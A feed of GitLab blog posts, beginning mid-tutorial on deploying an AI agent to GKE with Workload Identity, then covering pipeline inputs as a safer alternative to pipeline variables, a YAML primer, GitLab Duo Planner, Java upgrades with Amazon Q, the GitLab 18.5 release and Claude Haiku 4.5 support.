-n default --timeout=5m EXTERNAL_IP=$(kubectl get service ai-agent-service -n default -o jsonpath='{.status.loadBalancer.ingress[0].ip}') echo "Deployed at: http://$EXTERNAL_IP" only: - main #### The critical configuration for GKE What makes this work — and why we need this extra configuration for GKE— is that we must have a Kubernetes Service Account in the cluster that can work with Vertex AI. We need that service account to be permitted to access the AI capabilities of Google Cloud. Without this, we can deploy the application, but the AI agent won't work. We need to create a Kubernetes Service Account that can access Vertex AI. Run this one-time setup: #!/bin/bash PROJECT_ID="your-project-id" GSA_NAME="ai-agent-vertex" GSA_EMAIL="${GSA_NAME}@${PROJECT_ID}.iam.gserviceaccount.com" KSA_NAME="ai-agent-ksa" CLUSTER_NAME="your-cluster" REGION="us-central1" # Create GCP Service Account gcloud iam service-accounts create $GSA_NAME \ --display-name="AI Agent Vertex AI" \ --project=$PROJECT_ID # Grant Vertex AI permissions gcloud projects add-iam-policy-binding $PROJECT_ID \ --member="serviceAccount:${GSA_EMAIL}" \ --role="roles/aiplatform.user" # Get cluster credentials gcloud container clusters get-credentials $CLUSTER_NAME \ --region $REGION --project $PROJECT_ID # Create Kubernetes Service Account kubectl create serviceaccount $KSA_NAME -n default # Link accounts kubectl annotate serviceaccount $KSA_NAME -n default \ iam.gke.io/gcp-service-account=${GSA_EMAIL} gcloud iam service-accounts add-iam-policy-binding ${GSA_EMAIL} \ --role=roles/iam.workloadIdentityUser \ --member="serviceAccount:${PROJECT_ID}.svc.id.goog[default/${KSA_NAME}]" \ --project=$PROJECT_ID ### 4. Deploy to GKE Once you're done, push this change to the pipeline and you're good to go. You can see the pipeline has just deployed. Go to **CI/CD > Pipelines** and you'll see the four stages: * Build * Test (with all defined security scans) * Upload to Artifact Registry (successful) * Deploy to Kubernetes in GKE (success) ## Summary With GitLab and Google Cloud together, you're able to deploy your AI agent to GKE with ease and security. We didn't have to go through a lot of steps — we were able to do that thanks to GitLab's native integration with Google Cloud. Watch this demo: <!-- blank line --> <figure class="video_container"> <iframe src="https://www.youtube.com/embed/mc2pCL5Qjus?si=QoH02lvz5KH5Ku9O" frameborder="0" allowfullscreen="true"> </iframe> </figure> <!-- blank line --> > Use this tutorial's complete code example to get started now. Not a GitLab customer yet? Explore the DevSecOps platform with a free trial. Startups hosted on Google Cloud have a special perk to try and use GitLab.
about.gitlab.com
November 10, 2025 at 10:23 PM
Migrate from pipeline variables to pipeline inputs for better security
Pipeline variables have long been a convenient way to customize GitLab CI/CD pipelines at runtime. However, as CI/CD security best practices have evolved, we've recognized the need for stronger controls around pipeline customization. Unrestricted pipeline variables allow any users with pipeline trigger permissions to override values without validation or type checking. Beyond security considerations, pipeline variables lack proper documentation and explicit declaration, making it difficult to understand what inputs are expected and how they're used throughout your pipeline. This can lead to maintenance challenges and make it harder to establish proper governance over your CI/CD processes. ## Enter pipeline inputs Instead of relying on pipeline variables, we strongly recommend using GitLab's pipeline inputs feature. Pipeline inputs provide: * **Explicit declaration** : Inputs must be explicitly declared in your `.gitlab-ci.yml` and are self-documented. * **Type safety** : Support for different input types (string, boolean, number, array) * **Built-in validation** : Automatic validation of input values * **Better security** : No risk of variable injection attacks — only the declared inputs can be passed from the outside ### Basic example spec: inputs: deployment_env: description: "Target deployment environment" type: string options: ["staging", "production"] default: "staging" enable_tests: description: "Run test suite" type: boolean default: true test: script: - echo "Running tests" rules: - if: $[[ inputs.enable_tests ]] == true deploy: script: - echo "Deploying to $[[ inputs.deployment_env ]]" Learn more about how CI/CD inputs provide type-safe parameter passing with validation in this tutorial. ## Restrict pipeline variables To effectively move to pipeline inputs and away from pipeline variables, you should configure the "Minimum role to use pipeline variables" setting. This setting provides fine-grained control over which role can use pipeline variables when triggering pipelines. **At the project level:** Navigate to your project's **Settings > CI/CD > Variables > Minimum role to use pipeline variables** to configure the setting. Available options are: * **No one allowed** (`no_one_allowed`) - Recommended and most secure option. Prevents all variable overrides. * **Developer** (`developer`) - Allows developers and above to override variables * **Maintainer** (`maintainer`) - Requires maintainer role or higher * **Owner** (`owner`) - Only project owners can override variables **At the group level:** Group maintainers can go to **Settings > CI/CD > Variables > Default role to use pipeline variables** to establish secure defaults for all new projects within their group, ensuring consistent security policies across your organization. Here we recommend again to use **No one allowed** as default value — this way, new projects in this group are created with a secure default setting. Note that this still allows project owners to change the setting. When pipeline variables are restricted completely (with “No one allowed”), the prefilled variables won’t appear in the "New Pipeline UI" form. ## How to migrate from pipeline variables ### Close the gaps Your group may have projects that have pipeline variables enabled by default despite never having used them when triggering a pipeline. These projects can be migrated to the more secure setting without a risk of interruption. GitLab provides migration functionality via group settings: * Go to **Settings > CI/CD > Variables** * In **Disable pipeline variables in projects that don’t use them,** select **Start migration**. This migration is a background job that safely disables pipeline variables via project settings for all projects that historically have not used them. ### Convert pipeline variables to inputs For each identified pipeline variable, create a corresponding pipeline input. **Before (using pipeline variables)** variables: DEPLOY_ENV: description: "Deployment environment" value: "staging" ENABLE_CACHE: description: "Enable deployment cache" value: "true" VERSION: description: "Application version" value: "1.0.0" deploy: script: - echo "Deploying version $VERSION to $DEPLOY_ENV" - | if [ "$ENABLE_CACHE" = "true" ]; then echo "Cache enabled" fi **After (using pipeline inputs)** spec: inputs: deploy_env: description: "Deployment environment" type: string default: "staging" options: ["dev", "staging", "production"] enable_cache: description: "Enable deployment cache" type: boolean default: true version: description: "Application version" type: string default: "1.0.0" regex: '^[0-9]+\.[0-9]+\.[0-9]+$' deploy: script: - echo "Deploying version $[[ inputs.version ]] to $[[ inputs.deploy_env ]]" - | if [ "$[[ inputs.enable_cache ]]" = "true" ]; then echo "Cache enabled" fi ### Migrate trigger jobs If you use trigger jobs with the `trigger` keyword, ensure they don't define job-level `variables` or disable inheriting variables from top-level `variables`, `extends`, or `include`, because variables could implicitly be passed downstream as pipeline variables. If pipeline variables are restricted on the downstream project, pipeline creation will fail. Consider updating your CI configuration to use pipeline inputs instead of pipeline variables. variables: FOO: bar deploy-staging: inherit: variables: false # otherwise FOO would be sent downstream as a pipeline variable trigger: project: myorg/deployer inputs: deployment_env: staging enable_tests: true ## Summary Migrating from pipeline variables to pipeline inputs is a security enhancement that protects your CI/CD infrastructure from variable injection while providing better documentation, type safety, and validation. By implementing these restrictions and adopting pipeline inputs, you're not just improving security, you're also making your pipelines more maintainable, self-documenting, and resilient. The transition requires some initial effort, but the long-term benefits far outweigh the migration costs. Start by restricting pipeline variables at the group level for new projects, then systematically migrate existing pipelines using the step-by-step approach outlined above. Security is not a destination but a journey. Pipeline inputs are one important step in creating a more secure CI/CD environment, complementing other GitLab security features like protected branches, job token allowlists, and container registry protections. > To get started with pipeline inputs, sign up for a free trial of GitLab Ultimate today.
about.gitlab.com
November 4, 2025 at 10:21 PM
What is a YAML file? A complete guide from basics to practical use
YAML is a data serialization format used in Kubernetes files and Ansible playbooks. This article provides a detailed explanation of basic YAML file syntax and practical use cases. What's covered: * What is YAML? * What is YAML used for? * YAML vs. YML: What's the difference? * YAML vs. JSON format differences * YAML vs. CUE comparison * YAML data structures and syntax (fundamentals) * Using YAML in GitLab * Let's edit a YAML file * YAML FAQs ## What is YAML? YAML is a programming language designed to help express data concisely and understandably. It's frequently used for configuration files and data transfer. YAML is well-suited for organizing hierarchical information and is often used as an alternative to JSON and XML. ## What is YAML used for? Thanks to its easy readability, YAML is used for writing configuration files and playbooks. Here are some examples for reference: * Configuration file descriptions * Log files * Inter-process messaging * Data sharing between applications * Structured data descriptions ## YAML vs. YML: What's the difference? Both refer to the same file format — the only difference is whether the extension is .yml or .yaml. While .yaml is the official extension indicating a YAML file, extensions are generally written in three characters (like .txt, .zip, .exe, .png), so .yml conforms to this three-character convention. Developers who prefer concise notation often choose .yml. ## YAML vs. JSON format differences While JSON format uses curly braces to define requirements, YAML uses indentation to express structure, resulting in better readability. Compare the samples below. You'll see that YAML prioritizes ease of use for programmers. YAML: JSON: ## YAML vs. CUE comparison While YAML has high readability and a simple structure, CUE integrates schemas and data, allowing complex configurations to be managed in a single file. CUE also has schema validation functionality that YAML alone cannot achieve, making it easier to ensure data consistency. Flexibility is another major characteristic. CUE is an open source language (specifically, a superset of JSON) used to define, generate, and validate all kinds of data, so it can integrate with many other languages like Go, JSON, OpenAPI, Protocol Buffers, and YAML. CUE also has scripting capabilities through the Go API, which comes in handy when displaying CUE-based manifests as final Kubernetes resource YAML or implementing commands to list resources for deployment to specific clusters. ## YAML data structures and syntax (fundamentals) ### Important notes for writing YAML files Remember that indentation and tabs are extremely important. Extra indentation or tabs can change the meaning of YAML objects, making these elements critical. ### YAML data structures YAML primarily consists of two types of data: collections and scalars. Collections are made up of sequences and mappings. Sequences are arrays, and mappings are name-value pairs (expressed as Key: Value arrays). Scalars are used to distinguish types and represent strings, numbers, and other values. * Collections * Sequences * Mappings * Scalars ### Writing YAML syntax * Multi-line collections: Use the | (vertical bar) symbol when you need to preserve the format of multiple lines. * Multi-line formatting: When you have long string values and need to write them across multiple lines while preserving the format, use >. * Lists: Lists are expressed using - (hyphens). * Nesting: Nested data structures are expressed using indentation. ## Using YAML in GitLab GitLab CI/CD pipelines use a YAML file called .gitlab-ci.yml for each project to define pipeline structure and execution order. The content configured in this file is processed within GitLab Runner. Please refer to this CI/CD YAML syntax. ## Let's edit a YAML file Thanks to its simplicity and readability, YAML is widely used across various applications, including configuration files, CI/CD pipelines, container orchestration tools like Kubernetes, documentation, and configuration management. Its readability enables developers and operations engineers to easily manage configurations and data, allowing them to work efficiently. Understanding YAML will make configuring various systems and tools simpler and more intuitive. ## YAML FAQs ### What is YAML used for? Thanks to its simplicity and readability, YAML is widely used across various applications including configuration files, CI/CD pipelines, container orchestration tools like Kubernetes, documentation, and configuration management. ### What's the difference between YAML and JSON? While JSON files use curly braces to define requirements, YAML uses indentation to express structure, resulting in better readability. However, note that indentation and spacing are extremely important in YAML. ### Why is YAML popular? YAML is a popular data serialization language among developers because of its readability, versatility, and use of an indentation system similar to Python. YAML supports multiple data types and has parser libraries available for many programming languages, allowing it to handle various data serialization tasks and be utilized in a wide range of scenarios.
about.gitlab.com
October 31, 2025 at 10:24 PM
Ace your planning without the context-switching
Software development teams face a challenging balancing act: dozens of tasks, limited time, and constant pressure to pick the right thing to work on next. The planning overhead of structuring requirements, managing backlogs, tracking delivery, and writing status updates steals hours from strategic thinking. The result? Less time for the high-value decisions that actually drive products forward. That’s why we developed GitLab Duo Planner, an AI agent built on GitLab Duo Agent Platform to support product managers directly within GitLab. GitLab Duo Planner isn't another generic AI assistant. GitLab's product and engineering teams, who live these challenges daily like many of our customers, purpose-built GitLab Duo Planner to orchestrate planning workflows and reduce overhead while improving alignment and predictability. ## Your new planning teammate Today’s planning workflows face three major problems: 1. Prone to drift - Unplanned and orphaned work reduce trust in the plan. 2. Disruptive to developers - Constant interruptions for status updates break flow. 3. Opaque - Hidden risks surface too late to course-correct. Transforming the way teams work, GitLab Duo Planner turns manual overhead like vague ideas into structured requirements in minutes. Surface hidden backlog problems before they derail sprints. Apply RICE and MoSCoW frameworks instantly to make confident prioritization decisions. With awareness of GitLab context across the platform, every interaction with GitLab Duo Planner saves time and improves decision quality. This is possible because of the foundational agent architecture, bringing deep domain expertise and context awareness specific to GitLab. ## Built for teams GitLab Duo Planner leverages work items (epics, issues, tasks) and understands the nuances of work breakdown structures, dependency analysis, and effort estimation, making it well positioned to improve visibility, alignment, and confidence in delivery. * Platform approach - Unlike point solutions, Duo Planner orchestrates across your entire GitLab platform, from planning through development and testing, driving visibility across teams and workflows. * Embedded in the flow - No more context-switching between tools or diving deep into GitLab to retrieve information. Duo Planner enables contributions, collaboration, and transparency from users across the software development lifecycle. * Saves time and effort - Use Duo Planner to free your teams from repetitive coordination work, improving delivery predictability, reducing missed commitments while bringing in focus on what actually moves the needle. ## From chaos to clarity GitLab Duo Planner can help at different stages of software planning and delivery while operating within the planning scope, providing a safe, bounded environment with project visibility. The agent can help with six flows: * Prioritization - Apply frameworks like RICE, MoSCoW, or WSJF to rank work items intelligently * Work breakdown - Decompose initiatives into epics, features, and user stories to structure requirements * Dependency analysis - Identify blocked work and understand relationships between items to maintain velocity * Planning - Organize sprints, milestones, or quarterly planning * Status reporting - Generate summaries of project progress, risks, and blockers to track delivery * Backlog management - Identify stale issues, duplicates, or items needing refinement to improve data hygiene Here is an example how GitLab Duo Planner can check the status of an initiative: <div style="padding:56.25% 0 0 0;position:relative;"><iframe src="https://player.vimeo.com/video/1131065078?badge=0&autopause=0&player_id=0&app_id=58479" frameborder="0" allow="autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share" referrerpolicy="strict-origin-when-cross-origin" style="position:absolute;top:0;left:0;width:100%;height:100%;" title="GitLab Duo Planner Agent"></iframe></div><script src="https://player.vimeo.com/api/player.js"></script> <p></p> Duo Planner is available as a custom agent in the Duo Chat side panel, with the current page context. <p></p> <p></p> Let’s ask Duo Planner about the status of an initiative by providing the epic link: <p></p> We receive a structured summary with an overview, current status of milestones, in-progress items, dependencies, and blockers, along with actionable recommendations. <p></p> Next, let’s ask for an executive summary to share with stakeholders: GitLab Duo Planner eliminates hours of manual analysis and reporting effort, helping to make decisions faster and keep all stakeholders updated. <p></p> <p></p> Here are a few more prompts you can try with GitLab Duo Planner: * “Which of the bugs with a “boards” label should we fix first, considering user impact?” * “Rank these epics by strategic value for Q1.” * “Help me prioritize technical debt against new features.” * “What tasks are needed to implement this user story?” * “Suggest a phased approach for this project: (insert URL).” ## What's next GitLab Duo Planner focuses intentionally on product managers and engineering managers working in Agile environments. Why? Because specificity drives performance. By training Duo Planner deeply on GitLab's planning workflows and Agile frameworks, we deliver reliable, actionable insights rather than generic suggestions. As we evolve the platform, we envision a family of specialized agents, each optimized for specific workflows while contributing to a unified intelligence layer. Today's planner for software teams is just the beginning of how AI will transform work prioritization across all teams. > If you’re an existing GitLab customer and would like to try GitLab Duo Planner with a prompt of your own, visit our documentation where we cover prerequisites, use cases, and more.
about.gitlab.com
October 30, 2025 at 10:14 PM
Modernize Java applications quickly with GitLab Duo with Amazon Q
Upgrading applications to newer, supported versions of Java has traditionally been a tedious and time-consuming process. Development teams must spend countless hours learning about deprecated APIs, updated libraries, and new language features. In many cases, significant code rewrites are necessary, turning what should be a straightforward upgrade into a multi-week project that diverts resources from building new features. GitLab Duo with Amazon Q changes this paradigm entirely with AI-powered automation. What once took weeks can now be accomplished in minutes, with full traceability and ready-to-review merge requests that maintain your application's functionality while leveraging modern Java features. ## How it works: Upgrade your Java application Let's walk through how you can modernize a Java 8 application to Java 17. **Start with an issue** First, create an issue in your GitLab project describing your modernization goal. You don't need to specify version details - GitLab Duo with Amazon Q is able to detect that your application is currently built with Java 8 and needs to be upgraded. Simply describe that you want to refactor your code to Java 17 in the issue title and description. **Trigger the transformation** Once your issue is created, invoke GitLab Duo with Amazon Q using the `/q transform` command in a comment on the issue. This simple command sets in motion an automated process that will analyze your entire codebase, create a comprehensive upgrade plan, and generate all necessary code changes. **Automated analysis and implementation** Behind the scenes, Amazon Q analyzes your Java 8 codebase to understand your application's structure, dependencies, and implementation patterns. It identifies deprecated features, determines which Java 17 constructs can replace existing code, and creates a merge request with all the necessary updates. The transformation updates not just your source code files — including CLI, GUI, and model classes — but also your build configuration files like `pom.xml` with Java 17 settings and dependencies. **Review and verification** The generated merge request provides a complete view of all changes. You can review how your code has been modernized with Java 17 language features and verify that all tests still pass. The beauty of this approach is that all functionality is preserved and your application works exactly the same way, just with improved, more modern code. ## Why use GitLab Duo with Amazon Q Leveraging GitLab Duo with Amazon Q for application modernization has a number of advantages for development teams: **Time reduction** : What traditionally takes weeks of developer effort is reduced to hours or minutes, freeing your team to focus on building new features rather than managing technical debt. **Minimized risk** : The automated analysis and transformation process reduces the risk of human error that often accompanies manual code migrations. Every change is traceable and reviewable through GitLab's merge request workflow. **Complete audit trail** : Every transformation is documented through GitLab's version control, providing a clear record of what changed and why, which is essential for compliance and troubleshooting. **Enterprise-grade security** : The integration leverages GitLab's end-to-end security features and AWS's robust cloud infrastructure, helping to ensure your code and data remain protected throughout the modernization process. Are you ready to see GitLab Duo with Amazon Q in action? Watch our complete walkthrough video demonstrating the Java modernization process from start to finish: <!-- blank line --> <figure class="video_container"> <iframe src="https://www.youtube.com/embed/qGyzG9wTsEo?si=47JnSb6flOgZAJcR" frameborder="0" allowfullscreen="true"> </iframe> </figure> <!-- blank line --> > To learn more about GitLab Duo with Amazon Q visit our web site or reach out to your GitLab representative. ## Read more * Agentic AI guides and resources * GitLab Duo with Amazon Q: DevSecOps meets agentic AI * More GitLab Duo with Amazon Q tutorials
about.gitlab.com
October 30, 2025 at 10:14 PM
GitLab 18.5: Intelligence that moves software development forward
Software development teams are drowning in noise. Thousands of vulnerabilities flood security dashboards, but only a fraction pose real risk. Developers context-switch between planning backlogs, triaging security findings, reviewing code, and responding to CI/CD failures — losing hours to manual work. GitLab 18.5 calms this chaos. At the heart of this release is a valuable improvement in overall usability of GitLab and how AI integrates into your user experience. A new panel-based UI makes it easier to see data in context, and allows GitLab Duo Chat to be persistently visible across the platform, wherever it is needed. Purpose-built agents tackle vulnerability triage and backlog management, and popular AI tools integrate with agentic workflows even more seamlessly than before. We’ve also extended our market-leading security capabilities to help you better identify exploitable vulnerabilities versus theoretical ones, distinguish active credentials from expired ones, and scan only changed code to keep developers in flow. ## What’s new in 18.5 18.5 represents our biggest release so far this year — watch our introduction to the release, and read more details below. <div style="padding:56.25% 0 0 0;position:relative;"><iframe src="https://player.vimeo.com/video/1128975773?badge=0&autopause=0&player_id=0&app_id=58479" frameborder="0" allow="autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share" referrerpolicy="strict-origin-when-cross-origin" style="position:absolute;top:0;left:0;width:100%;height:100%;" title="GitLab_18.5 Release_101925_MP_v2"></iframe></div><script src="https://player.vimeo.com/api/player.js"></script> <p></p> ### Modern user experience with quick access to GitLab Duo everywhere GitLab 18.5 delivers a modernized user experience with a more intuitive interface driven by a new panel-based layout. With panels, key information appears side by side so that you can work contextually, without losing your place. For example, when you click on an issue in the issues list, its details automatically open in a side panel. You can also launch the GitLab Duo panel on the right, bringing Duo wherever you are in GitLab. This lets you ask contextual questions or give instructions, right alongside your work. Several usability improvements make navigation easier. The global search box now appears at the top center for improved accessibility. Global navigation elements, including Issues, Merge Requests, To-Dos, and your avatar have moved to the top right. Additionally, the left sidebar is now collapsible and expandable, giving you more control over your workspace. Teams using experimental and GitLab Duo beta features will be the first to receive the new interface, followed by all GitLab.com users who will be able to turn this experience on using the toggle located under your user icon. To learn more about this feature, reference our documentation here. Please share your feedback or report any issues here, you're helping us shape a better GitLab! ### Updates to GitLab Duo Agent Platform **Security Analyst Agent: Transform manual vulnerability triage into intelligent automation** GitLab Duo Security Analyst Agent automates vulnerability management workflows through AI-powered analysis, helping transform hours of manual triage into intelligent automation. Building on the Vulnerability Management Tools available through GitLab Duo Agentic Chat, Security Analyst Agent orchestrates multiple tools, applying security policies, and creating custom flows for recurring workflows automatically. Security teams can access enriched vulnerability data, including CVE details, static reachability analysis, and code flow information, while executing operations like dismissing false positives, confirming threats, adjusting severity levels, and creating linked issues for remediation — all through conversational AI. The agent reduces repetitive clicking through vulnerability dashboards and replaces custom scripts with simple natural language commands. For example, when a security scan reveals dozens of vulnerabilities, simply prompt: "Dismiss vulnerabilities with reachable=FALSE and create issues for critical findings." Security Analyst Agent analyzes reachability data, applies security policies, and completes bulk operations in moments — helping decrease work that would otherwise take hours. While individual Vulnerability Management Tools can be accessed directly through Agentic Chat for specific tasks, Security Analyst Agent orchestrates these tools intelligently and automates complex multi-step workflows. Note that Vulnerability Management Tools are available through Agentic Chat on GitLab Self-managed and GitLab.com instances, and Security Analyst Agent is available on GitLab.com only for 18.5, while availability in Self-managed and Dedicated environments will come with our next release. Watch this demo: <div style="padding:56.25% 0 0 0;position:relative;"><iframe src="https://player.vimeo.com/video/1128975984?badge=0&autopause=0&player_id=0&app_id=58479" frameborder="0" allow="autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share" referrerpolicy="strict-origin-when-cross-origin" style="position:absolute;top:0;left:0;width:100%;height:100%;" title="18.5 Security Demo"></iframe></div><script src="https://player.vimeo.com/api/player.js"></script> <p></p> **GitLab Duo Planner: Turn backlog chaos into strategic clarity** Managing complex software delivery requires constant context-switching between planning tasks. GitLab Duo Planner addresses the real-world planning challenges we see teams face every day. Duo Planner acts as your teammate with awareness of your project context, including how you manage issues, epics, and merge requests. Unlike generic AI assistants, it's purpose-built with deep knowledge of GitLab's planning workflows coupled with Agile and prioritization frameworks to help you balance effort, risk, and strategic alignment. GitLab Duo Planner can turn vague ideas into structured planning hierarchies, identify stale backlog items, and draft executive updates. For example, when refining your backlog with hundreds of issues accumulated over months, simply prompt: "Identify stale backlog items and suggest priorities." Within seconds, you'll receive a structured summary showing issues without recent activity, items missing key details, duplicate work, and recommended priorities based on labels and milestones, complete with actionable recommendations. For teams managing complex roadmaps, the Planner aims to eliminate hours of manual analysis and context-switching, helping Product Managers and engineering leads make faster, more informed decisions. As of 18.5, GitLab Duo Planner is currently “read-only,” meaning that it can analyze, plan, and suggest, but cannot yet take direct action to modify anything. Please see our documentation for more information. **Extensible Agent Catalog: Popular AI tools as native GitLab agents** GitLab 18.5 introduces popular AI agents directly into the AI Catalog, making external tools like Claude, OpenAI Codex, Google Gemini CLI, Amazon Q Developer, and OpenCode available as native GitLab agents. Users can now discover, configure, and deploy these agents through the same unified catalog interface used for GitLab's built-in agents, with automatic syncing of foundational agents across organization catalogs. This eliminates the complexity of manual agent setup by providing a point-and-click catalog experience while maintaining enterprise-grade security through GitLab's authentication and audit systems. GitLab Duo Enterprise subscriptions now include built-in usage of Claude and Codex within GitLab, allowing you to use your existing GitLab subscription for these tools without requiring separate API keys or additional billing setup. Other agents may still require separate subscriptions and configuration while we finalize our integration plans. **Self-hosted GitLab Duo Agent Platform (Beta): Address data sovereignty requirements without sacrificing AI power** GitLab 18.5 moves GitLab Duo Agent Platform's self-hosted capabilities from experimental to beta, enabling organizations to execute AI agents and flows entirely within their own infrastructure — critical for regulated industries and data sovereignty requirements. The beta release includes improved timeout configurations and AI Gateway settings, allowing teams to use AI agents for code reviews, bug fixes, and feature implementations, while providing enterprise-grade security for sensitive code. ## Smarter, faster security: Prioritize real risks and keep developers in the flow GitLab 18.5 introduces new application security capabilities that help teams focus on exploitable risk, reduce noise, and strengthen software supply chain security. These updates continue our commitment to building security directly into the development process — delivering precision, speed, and insight without disrupting developer flow. **Static Reachability Analysis** With over 37,000 new CVEs issued this year, security teams face an overwhelming volume of vulnerabilities and struggle to understand which ones are truly exploitable. Static Reachability Analysis, now in limited availability, brings library-level precision by helping to identify whether vulnerable code is actually invoked in your application, not just present in dependencies. Paired with our recently released Exploit Prediction Scoring System (EPSS) and Known Exploited Vulnerability (KEV) data, security teams can more effectively accelerate vulnerability triage and prioritize real risks to help strengthen overall supply chain security. In 18.5, we’re adding support for Java, alongside existing support for Python, JavaScript, and TypeScript. **Secret Validity Checks** Just as Static Reachability Analysis helps teams prioritize exploitable vulnerabilities from open source dependencies, Secret Validity Checks bring the same insight to exposed secrets — currently available in beta on GitLab.com and GitLab Self-Managed. For GitLab-issued security tokens, instead of manually verifying whether a leaked credential or API key is active, GitLab automatically distinguishes active secrets from expired ones directly in the Vulnerability Report. This helps enable security and development teams to focus remediation efforts on genuine risks. Support for AWS- and GCP-issued secrets is planned for future releases. **Custom rules for Advanced SAST** Advanced SAST runs on rules informed by our in-house security research team, designed to maximize accuracy out of the box. However, some teams required additional flexibility to tune the SAST engine for their specific organization. With Custom Rules for Advanced SAST, AppSec teams can define atomic, pattern-based detection logic to help capture security issues specific to their organization — like flagging banned function calls — while still using GitLab’s curated ruleset as the baseline. Customizations are managed through simple TOML files, just like other SAST ruleset configurations. While these rules will not support taint analysis, they do give organizations greater flexibility in achieving accurate SAST results. **Advanced SAST C and C++ language support** We’re expanding our language coverage for Advanced SAST to include C and C++, which are widely used languages in embedded systems software development. To enable scanning, projects must generate a compilation database that captures compiler commands and includes paths used during builds. This works to ensure the scanner can accurately parse and analyze source files, delivering precise, context-aware results that help security teams identify real vulnerabilities in the development process. The implementation requirements for C and C++ require specific configurations, which can be found in our documentation. Advanced SAST C and C++ support are currently available in beta. **Diff-based SAST scanning** Traditional SAST scans re-analyze entire codebases with every commit, slowing pipelines and disrupting developer flow. The developer experience is a critical consideration that can make or break the adoption of application security testing. Diff-based SAST scanning aims to speed up scan times by focusing only on the code changed in a merge request, reducing redundant analysis and surfacing relevant results tied to the developer’s work. By aligning scans with actual code changes, GitLab delivers faster, more focused feedback that helps keep developers in flow while maintaining strong security coverage. ## Simplify API configurations API-driven workflows offer power and flexibility, but they can also create unnecessary complexity for tasks that teams need to perform regularly. The new Maven Virtual Registry interface brings a UI layer to these operations. ### Maven Virtual Registry interface The new web-based interface for managing Maven Virtual Registries turns complex API configurations into visual simplicity, providing a more intuitive experience for package administrators and platform engineers. Previously, teams configured and maintained virtual registries only through API calls, which made routine maintenance time-consuming and required specialized platform knowledge. The new interface removes that barrier, helping to make everyday tasks faster and easier. With this update, you can now: * Create virtual registries to simplify dependency configuration * Create and order upstreams to help improve performance and compliance * Browse and clear stale cache entries directly in the UI This visual experience helps reduce operational overhead and provides development teams with clearer insight into how dependencies are resolved, enabling them to make better decisions about build performance and security policies. Watch a demo: <!-- blank line --> <figure class="video_container"> <iframe src="https://www.youtube.com/embed/CiOZJPhAvaI?si=cYaoR_OIgqFKbyM2" frameborder="0" allowfullscreen="true"> </iframe> </figure> <!-- blank line --> <p></p> We invite enterprise customers to join the Maven Virtual Registry Beta program and share feedback to help shape the final release. ## AI that adapts to your workflow This release represents more than new capabilities — it's about choice and control. Watch the walkthrough video here: <p></p> <div style="padding:56.25% 0 0 0;position:relative;"><iframe src="https://player.vimeo.com/video/1128992281?badge=0&autopause=0&player_id=0&app_id=58479" frameborder="0" allow="autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share" referrerpolicy="strict-origin-when-cross-origin" style="position:absolute;top:0;left:0;width:100%;height:100%;" title="18.5-tech-demo"></iframe></div><script src="https://player.vimeo.com/api/player.js"></script> <p></p> GitLab Premium and Ultimate users can start using these capabilities today on GitLab.com and self-managed environments, with availability for GitLab Dedicated customers planned for next month. GitLab Duo Agent Platform is currently in **beta** — enable beta and experimental features to experience how full-context AI can transform the way your teams build software. New to GitLab? Start your free trial and see why the future of development is AI-powered, secure, and orchestrated through the world’s most comprehensive DevSecOps platform. _**Note:** Platform capabilities that are in beta are available as part of the GitLab Beta program. They are free to use during the beta period, and when generally available, they will be made available with a paid add-on option for GitLab Duo Agent Platform._ ### Stay up to date with GitLab To make sure you’re getting the latest features, security updates, and performance improvements, we recommend keeping your GitLab instance up to date. The following resources can help you plan and complete your upgrade: * Upgrade Path Tool – enter your current version and see the exact upgrade steps for your instance * Upgrade Documentation – detailed guides for each supported version, including requirements, step-by-step instructions, and best practices By upgrading regularly, you’ll ensure your team benefits from the newest GitLab capabilities and remains secure and supported. For organizations that want a hands-off approach, consider GitLab’s Managed Maintenance service. With Managed Maintenance, your team stays focused on innovation while GitLab experts keep your Self-Managed instance reliably upgraded, secure, and ready to lead in DevSecOps. Ask your account manager for more information. _This blog post contains "forward‑looking statements" within the meaning of Section 27A of the Securities Act of 1933, as amended, and Section 21E of the Securities Exchange Act of 1934. Although we believe that the expectations reflected in these statements are reasonable, they are subject to known and unknown risks, uncertainties, assumptions and other factors that may cause actual results or outcomes to differ materially. Further information on these risks and other factors is included under the caption "Risk Factors" in our filings with the SEC. We do not undertake any obligation to update or revise these statements after the date of this blog post, except as required by law._
about.gitlab.com
October 30, 2025 at 10:14 PM
Claude Haiku 4.5 now available in GitLab Duo Agentic Chat
GitLab now offers Claude Haiku 4.5, Anthropic's fastest model combining high intelligence with exceptional speed, directly in the GitLab Duo model selector. Users have the flexibility to choose Claude Haiku 4.5 alongside other leading models, enhancing their GitLab Duo experience with near-frontier performance at remarkable speed. With strong performance on SWE-bench Verified (73.3%) and more than 2x the speed of Claude Sonnet 4.5, GitLab users can apply Claude Haiku 4.5 to accelerate their development workflows with rapid, intelligent responses. ## GitLab Duo Agent Platform + Claude Haiku 4.5 GitLab Duo Agent Platform extends the value of Claude Haiku 4.5 by enabling multi-agent orchestration, where Claude Haiku 4.5 can serve as a fast sub-agent executing parallel tasks while more powerful models handle high-level planning. This combination creates efficient agentic workflows, where speed meets intelligence across the software development lifecycle. The result is faster iterations, cost-effective AI assistance, and responsive experiences, all delivered inside the GitLab workflow developers already use every day. ## Where you can use Claude Haiku 4.5 Claude Haiku 4.5 is now available as a model option in GitLab Duo Agent Platform Agentic Chat on GitLab.com. You can choose Claude Haiku 4.5 from the model selection dropdown to leverage its speed and coding capabilities for your development tasks. **Note:** Ability to select Claude Haiku 4.5 in supported IDEs will be available soon. Key capabilities: * **Superior coding performance:** Achieves 73% on SWE-bench Verified, matching the intelligence level of models that were cutting-edge just months ago. * **Lightning-fast responses:** More than 2x faster than Sonnet 4.5, perfect for real-time pair programming. * **Enhanced computer use:** Outperforms Claude Sonnet 4 at autonomous task execution. * **Context awareness:** First Haiku model with native context window tracking for better task persistence. * **Extended thinking:** Pause and reason through complex problems before generating responses. ## Get started today GitLab Duo Pro and Enterprise customers can access Claude Haiku 4.5 today. Visit our documentation to learn more about GitLab Duo capabilities and models. Questions or feedback? Share your experience with us through the GitLab community. > Want to try GitLab Ultimate with Duo Enterprise? Sign up for a free trial today. ## Read more * Greater AI choice in GitLab Duo: Claude Sonnet 4.5 arrives * GitLab 18.4: AI-native development with automation and insight * GitLab Duo Chat gets agentic AI makeover
about.gitlab.com
October 30, 2025 at 10:14 PM
